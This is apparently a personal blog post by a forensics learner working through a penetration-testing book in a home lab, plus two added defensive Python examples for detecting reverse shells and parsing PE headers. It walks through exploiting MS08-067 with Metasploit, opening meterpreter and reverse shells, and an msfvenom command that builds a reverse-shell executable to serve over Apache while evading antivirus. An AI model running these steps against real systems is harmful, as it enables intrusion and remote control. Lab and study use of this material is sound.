So you're probably wondering, why pen testing? What does pen testing have to do with forensics? There are myriad situations that will require the assistance of an incident responder, and a remote malicious actor is one of them. When you respond to an incident involving a malware infection, it's vital to analyze its behavior after it has infected the system, to competently explain what level of access the infection was able to accomplish. After all, the blue team is the response team. But since responding to a possible hack is part of a blue teamer's job description, it only makes sense to educate yourself in understanding how a hack takes place. Let's go back to the malware forensics example. Malware incident responders are interested in figuring out how the malware found its way into your system, and how it behaved once it infected your system. You can determine the answers to these questions, and many more, just by analyzing the malware itself dynamically. But there are so many ways in which a malicious actor can infect a system: e-mail, messaging clients, removable drives, cloud synchronization, drive-by downloads, etc. So by learning about the techniques used by hackers, and how they use malware to gain access to a system, aren't we better preparing ourselves for when we respond to an incident and are asked, how did this happen? Technically, learning pen testing techniques will benefit a network security analyst more than a forensic analyst. If you were to learn anti-forensic techniques, that would be one thing. But there is a reason why these two fields of information security have been separated. They both have separate goals and objectives, but they also have certain areas of information that overlap. Besides, I'm interested in all areas of computer security.
"Penetration Testing: A Hands-on Introduction to Hacking", by Georgia Weidman, is a great introduction to the methods of penetration testing and security reconnaissance. It is perfect for those who'd like to learn some basic information on how to audit a network, the fundamental steps of hacking, and some basics of software exploitation. What's great about a book like this is that it teaches you the material while also acting as a step-by-step guide to help you reinforce what you are learning. Similar to a classroom environment, it teaches you the mechanics of a targeted environment, then how to use particular tools, while briefly explaining their purposes and functionalities. Kinda like Brian Carrier's book, "File System Forensic Analysis", where he presents a few step-by-step examples on how to use The Sleuth Kit and Autopsy. But in Carrier's book, a solid 70 percent of it explains the technologies associated with the operating systems, and about 30 percent covers the TSK tools and how they relate to forensics.
To give a bit of a heads up, if you choose to follow along with her book, there are a lot of pages dedicated to installations of programs, and target installations. I ran into some issues here and there, but in the end, I was able to get everything working accordingly. Working on this stuff alone, while running into issues, can certainly set you back on the clock. Some things I remained stuck on for a month or more :(. But this is how a lot of my experiences have gone, when trying to run certain programs, while following along with either a pentesting or forensics book.
For example, after installing Kali Linux 2016, I needed to install the Android SDK via sudo apt-get, and while attempting to run the Android emulator, got nothing but failed attempts. Seriously, it took me a very long time in order to continue on with the projects, simply because I couldn't get the damn thing to run. Luckily, I ran across a simple fix online, after months of searching, and found Kali 2016 required certain dependencies in order to run the SDK. I posted on my Twitter a while back, but here is the list:
I don't know how or why this allowed it to run; all I know is that it took a long time, and a hell of a lotta luck to find online. I'm sure there was some method to the madness, but right now I can't remember how I came to that conclusion. So make sure you install this architecture before installing the Android SDK.
Also, when trying to run Metasploit in Kali 2016 against a Windows XP SP3 target machine, I kept getting an error after typing the "exploit" command. The error message was, "Exploit completed, but no session was created". I had a screenshot of this error, but I sadly deleted it. Well, come to find out, the version of SP3 I was running had updates and service patches that were issued since 2015. These updates and patches were too recent for the NETAPI exploit I was trying to use via the textbook. So make sure, if you are trying to go along with the book, that you have an XP that has service patches no later than 2013.
Metasploit Introduction
Normally, when trying to run Metasploit on, say, an Ubuntu system, you'll need to install Ruby, PostgreSQL, the Metasploit Framework, and I'm sure a couple of other dependencies I cannot think of at the moment. In Kali 2016, there is simply a Metasploit icon in your favorites bar that starts your PostgreSQL database and msfconsole for you, along with the other services that are required to initiate Metasploit. Kali has made it very convenient for us to start up all the necessary programs in Metasploit, whereas in the past we would have had to start each one of these services individually.
PostgreSQL is just a database that will be set up on your system when Metasploit is run for the first time, and it will keep track of all of the targets and scans that you're working with. You can list your existing workspaces, each holding a set of "targets", by issuing the 'workspace' command inside msf.
When it comes to interfaces, msfconsole is the primary interface to be used, and it is automatically run in a shell when you press the Metasploit icon in the favorites bar of Kali Linux. There are other interfaces I will simply mention but not go into detail on: msfcli, which is a command-line interface that I don't think is even available anymore, and then there is Armitage, which provides a GUI.
Before I move on to the testing, there are a few terms I would like to go over that you will see mentioned frequently when using Metasploit.
- Payload modules: The payload is the code that will execute once you have found a vulnerability in a system through an exploit. Ex: meterpreter shell, trojans a.k.a. RATs, key loggers, etc. There can be multiple payloads administered through a single exploit. There are payloads that you can search for inside of the msf console, which have already been developed by Metasploit contributors. You will have to search the framework.
- Exploit modules: The piece of code that is created to take advantage of a vulnerability found in a system, app, or network. An exploit is what makes it possible to deliver a payload to an exploited system. Ex: The Conficker worm exploited a vulnerability in netapi32.dll via SMB. You can choose from the list of exploits made available through the Metasploit Framework by typing 'show exploits'. Once you have used an exploit against a vulnerability and have gained access to drop a payload, the exploit then becomes irrelevant.
- Auxiliary modules: These are modules that provide additional functionality such as scanning, fuzzing, sniffing, etc. Ex: nmap.
- Encoder modules: These are used to obfuscate payload and exploit modules so they are not detected by anti-virus software and firewalls.
How do we know what exploit modules will work?
So we have an IP address, and after some scanning with either Nmap or a TCP scanner, we know what OS version the target is using, and its MAC address. We have about 3,000 modules, and we can view them by issuing the show command (ex: show exploits, show payloads, etc.). In order to know what patches are missing from our target machine, we have to supply the IP address of our target to an Nmap scan. There are a lot of port scanning tools out there that will give you some starting information to work with. Nmap and Nessus are your two best options. (Nmap is used to identify ports and hosts inside of the network, while Nessus is generally the go-to tool for discovering the vulnerabilities.) Not only will you get a patch level assessment with scans like these, but you will also be able to ascertain the level of security controls that are put in place. Also, the amount of information you will be able to collect will depend on whether you are performing an internal or external scan. With an internal scan, you are able to collect more information of course, but security controls can make it difficult to perform such an assessment. Georgia Weidman's intro to hacking does cover vulnerability scanning with Nessus later on; I just wanted to quickly mention how a vulnerability is discovered before turning to Metasploit's library of exploits.
So, once you have run a Nessus scan against a targeted IP address, you will see the vulnerabilities it lists as existing within the target's system (ex: MS08-067):
https://jasonrodlund.wordpress.com/using-metasploit-for-ms08-067/
This photo of a Nessus scan, displaying vulnerabilities on a target system, isn't one of my screenshots. I'm postponing using my own Nessus account for the moment, since Georgia has exercises for these scans later on in the book.
So we see a vulnerability which Microsoft's security bulletin calls "MS08-067". MS08-067 is the patch name, while the vulnerability itself is in netapi32.dll. We can search for exploits that will work with this vulnerability via https://www.rapid7.com/db/modules/, as shown below:
And as you can see, there is already a prebuilt module that works as an exploit against this MS08-067 vulnerability (exploit/windows/smb/ms08_067_netapi).
You can also search for prebuilt modules that work against this vulnerability by using the built-in search engine inside of the msf console. Simply type 'search ms08-067', and the output shows you a matching module name that will work against this vulnerability:
So this is clearly the module we will want to use when "setting" an exploit directed at our target IP. To make sure that we can use this module against our target IP (i.e. that this module is compatible with our target's OS version), type 'info exploit/windows/smb/ms08_067_netapi':
Since I can't list the entire command's output, just trust me that it lists some valuable basic information, including information about the exploit and a list of OS targets it is eligible for, which in our case includes Windows XP SP3 English (NX). This module has 66 other possible OS targets.
Now let's set Metasploit to use this module, so we can then direct it toward our target's IP and send it some payload code. Type 'use windows/smb/ms08_067_netapi':
We now have our exploit loaded. But before we can move on, we need to supply some additional information to this exploit, to tell it where it is going. You can see these options by typing 'show options':
- RHOST: The IP address of the target system we intend to send this exploit to. You will have to type: 'set RHOST xxx.xxx.xx.xx'.
- RPORT: Refers to what port the exploit is sent over. With this exploit, by default, it uses the SMB protocol, which is port 445. So once you send the exploit, it will go over this port. 'set RPORT xxx'. But leave it alone, and the exploit will use the default setting.
- SMBPIPE: This is an auxiliary module that is used to scan for open SMB protocols within the target system to help it determine what OS version is running (I think).
- Exploit Target: By default, this setting is set to 0, which allows Metasploit to determine the target automatically. There is a list from 0-65+, listing different versions of operating systems to choose from. You choose what OS version your target is. If left at 0, it checks automatically. You can see this list by typing 'show targets', and keep in mind that all the OSes that are listed are operating systems that are vulnerable to this exploit.
Finding a compatible Payload
At this point you're probably wondering, ok, so what about the payload?? We need to tell our exploit what to do once it has successfully accessed the target system. Metasploit will usually choose the best matching payload without asking, but we can manually choose from the plethora of payloads available. Don't forget, Metasploit has a modular design, and we can mix and match exploits with different payloads as we see fit. But be careful, because some payloads are more intrusive on a system, and may cause a crash.
There are over 300 different payloads, and not all of them are compatible with our specific exploit. You can view the payloads that are compatible with the ms08_067_netapi exploit by typing 'show payloads', and you will see a list of injections and reverse shells that are all usable once you've exploited the system. Otherwise, the exploit module will just choose a default payload. But you should get into the habit of choosing a payload manually.
Run the ms08_067_netapi against a Win XP SP3 machine
After leaving the default payload as is, type 'exploit'. (I should mention, make sure your target XP machine has all the configurations that were directed in Weidman's book, and make sure your firewall is turned off):
Here we popped a meterpreter shell on the target machine. A meterpreter shell doesn't create a new process; instead it runs inside the address space of the exploited process. You can do a lot of damage with a meterpreter shell, especially if it has root level access. Here we only have system level access :(. As far as what kind of sensitive information we can extract with this access, I'll save that for later. This shell comes with a list of commands (tools) that allow you to do all sorts of things. Simply type 'help', and you will see these commands. Ex: key loggers.
Now let's run a reverse shell with Metasploit. We will use the 'set payload windows/shell_reverse_tcp' payload we saw earlier when we listed the payloads for this exploit. Usually you will find yourself using a reverse shell when the target system has firewall restrictions in place, and your only option is to open a listener on your attack machine, connect to the target machine via the exploit, then have the payload force the target machine to push a shell back to your attack machine, which you will be able to control as if you were sitting in front of the target machine with a shell open. Kinda like a netcat connection. 'set RHOST' to the IP address of the target machine, and 'set LHOST' to the IP address of the attack machine, since this is a reverse shell and we want the target to know where to send the shell back to:
Here we can see our reverse shell available for us on our attack machine.
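From the defender's side, the reverse shell described above leaves a telltale trace on the target: because the payload runs inside the exploited process, the outbound connection to LHOST:LPORT is owned by a Windows service process (the Server service that ms08_067_netapi hits lives in svchost.exe). This added example, which is not code from the post or from Weidman's book, parses constructed `netstat -ano` and `tasklist /fo csv` output and flags established connections from service images to ports no service should be talking to; the IP addresses, PIDs, the port 12345 and the allow-list are all assumptions.

```python
"""Spot a reverse-shell style connection in Windows netstat/tasklist output.

Added example (not from the post): an ESTABLISHED outbound connection owned
by a service host such as svchost.exe, to a port that no normal service uses,
is what the reverse_tcp payload looks like from the victim's point of view.
Both samples below are constructed, not captured from a real machine.
"""
import re

# Constructed sample of `netstat -ano` on the XP target (assumed layout).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.56.101:445     192.168.56.1:50231     ESTABLISHED     4
  TCP    192.168.56.101:1041    192.168.56.1:12345     ESTABLISHED     1032
  TCP    192.168.56.101:1042    93.184.216.34:80       ESTABLISHED     1588
"""

# Constructed sample of `tasklist /fo csv` (maps PID -> image name).
TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"svchost.exe","1032","Console","0","4,128 K"
"iexplore.exe","1588","Console","0","18,212 K"
"""

# Service hosts that should never originate arbitrary outbound connections.
SERVICE_IMAGES = {"svchost.exe", "lsass.exe", "services.exe", "spoolsv.exe"}
# Remote ports a service host may legitimately talk to (assumed allow-list).
ALLOWED_REMOTE_PORTS = {53, 80, 88, 135, 389, 443, 445}

NETSTAT_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def parse_tasklist(text):
    """Return {pid: image_name} from `tasklist /fo csv` output."""
    pids = {}
    for line in text.splitlines()[1:]:          # skip the CSV header row
        fields = [f.strip('"') for f in line.split('","')]
        pids[int(fields[1])] = fields[0]
    return pids


def find_suspicious(netstat_text, tasklist_text):
    """Flag ESTABLISHED connections from service images to unusual ports."""
    images = parse_tasklist(tasklist_text)
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue                              # header or non-TCP line
        _lip, _lport, rip, rport, state, pid = m.groups()
        image = images.get(int(pid), "?")
        if state == "ESTABLISHED" and image in SERVICE_IMAGES \
                and int(rport) not in ALLOWED_REMOTE_PORTS:
            hits.append((image, int(pid), rip, int(rport)))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("suspicious: %s (pid %d) -> %s:%d" % hit)
```

The inbound SMB session on port 445 is owned by PID 4 (System) and is not flagged; the svchost.exe connection to port 12345 is, which is exactly the shell being pushed back to the attack machine.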
I'm going to finish up this Metasploit introduction with a quick run-through of Msfvenom. This is a program that combines msfpayload and msfencode. I'm assuming this means it combines the Metasploit payloads with an encoding utility. Why would you want to encode payloads, you ask? Well, you can use it to re-encode already existing payloads to help prevent AV detection. It changes the encoding of the malicious executable to avoid some of the common detection techniques used. Once the executable is changed, it will run like any other Metasploit payload after it has accomplished the exploitation phase. This malicious executable will need to be run through user intervention, so this is where social engineering techniques come into play, or by compromising an active server.
You control Msfvenom from the root@kali:~# directory, and it is here where you will create your malicious executable. I'm having a bit of trouble with some of the commands in msfvenom, but for now, these are the best results I was able to accomplish:
Set our LHOST to our Kali IP address, so our exploit knows what to connect back to. We will also set our connecting port to LPORT=12345. This can all be accomplished in one line: 'msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.168.xxxxx LPORT=12346 -f exe > chapter4example.exe'. This creates the executable. You can view a description of the exe with the file command. Here is the output so far:
You can see the PE file format of a Windows executable, along with some errors I'm not going to try and figure out at the moment. If you now go to your XP target machine and browse to http://192.168.xxx/chapter4example.exe, and download the file, you will have successfully infected your target XP machine.
Since our Kali Linux machine can act as an Apache web server, we can offer this file online to those who are "willing" to visit our domain and download the malicious file.
First we need to copy our newly created exe to our Kali /var/www directory: 'cp chapter4example.exe /var/www', press enter, then type 'service apache2 start':
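What the file command is recognising above is the PE (Portable Executable) header layout, which is also what an analyst checks first when an unknown .exe turns up on a host. This added example, not code from the post or from Metasploit, walks the DOS header, follows e_lfanew to the "PE\0\0" signature and decodes the COFF file header; the sample bytes are a constructed header-only blob, not the msfvenom output and not a runnable program.

```python
"""Minimal PE header check, in the spirit of what `file` reports for an exe.

Added example (not from the post): enough of the PE format to confirm a file
really is a Windows executable, which CPU it targets and whether it is an EXE
or a DLL. build_sample_pe() constructs a header-only blob for demonstration.
"""
import struct

MACHINE_NAMES = {0x014C: "Intel 80386", 0x8664: "x86-64"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002   # COFF Characteristics flags
IMAGE_FILE_DLL = 0x2000


def build_sample_pe(machine=0x014C, characteristics=0x0102, sections=3):
    """Construct a header-only blob: 64-byte DOS header, stub, PE sig, COFF."""
    e_lfanew = 0x80                                   # offset of "PE\0\0"
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)   # e_lfanew at 0x3C
    stub = b"\0" * (e_lfanew - len(dos))              # where the DOS stub sits
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, sections, 0, 0, 0, 0xE0, characteristics)
    return dos + stub + b"PE\0\0" + coff


def describe_pe(data):
    """Return a dict describing the PE, or raise ValueError if it is not one."""
    if len(data) < 64 or data[:2] != b"MZ":
        raise ValueError("missing MZ DOS header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    if not chars & IMAGE_FILE_EXECUTABLE_IMAGE:
        raise ValueError("not an executable image (object file?)")
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsec,
        "optional_header_size": opt_size,
        "kind": "DLL" if chars & IMAGE_FILE_DLL else "EXE",
    }


if __name__ == "__main__":
    print(describe_pe(build_sample_pe()))
    print(describe_pe(build_sample_pe(machine=0x8664, characteristics=0x2022)))
```

To inspect a real file, read it with open(path, "rb").read() and pass the bytes to describe_pe(); a file that fails the MZ or PE check is not the Windows executable its extension claims.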
(Update)
For now, I'm unable to get Msfvenom to run correctly. I followed everything correctly, but I cannot access the downloadable malicious file from my target machine, with Kali hosting it in Apache. I get this error when I enter the IP address in the URL:
If I were to have successfully set this up, once I had encoded the payload, hosted it from a server, and had the user click and download the file, I would have assigned the Multi/Handler module beforehand, and had a reverse shell once the target downloaded the file (while evading AV).
For now I am moving on. I may come back to Msfvenom, but I have spent too much time on it already.